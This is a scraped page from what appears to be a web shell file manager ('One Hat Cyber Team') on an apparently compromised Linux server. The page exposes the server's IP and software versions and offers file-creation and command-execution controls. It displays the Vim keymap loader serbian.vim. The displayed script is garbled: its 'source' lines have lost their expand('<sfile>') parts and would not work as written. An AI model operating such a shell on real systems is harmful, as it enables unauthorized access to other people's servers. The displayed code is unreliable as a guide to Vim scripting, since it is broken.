⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.164
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-29-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:29:41 UTC 2025 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
vim
/
vim91
/
keymap
/
View File Name :
serbian.vim
let encoding = &enc if encoding == 'latin1' if has("unix") let encoding = 'iso-8859-2' else let encoding = 'cp1250' endif endif if encoding == 'utf-8' source
:p:h/serbian_utf-8.vim elseif encoding == 'cp1250' source
:p:h/serbian_cp1250.vim elseif encoding == 'cp1251' source
:p:h/serbian_cp1251.vim elseif encoding == 'iso-8859-2' source
:p:h/serbian_iso-8859-2.vim else source
:p:h/serbian_iso-8859-5.vim endif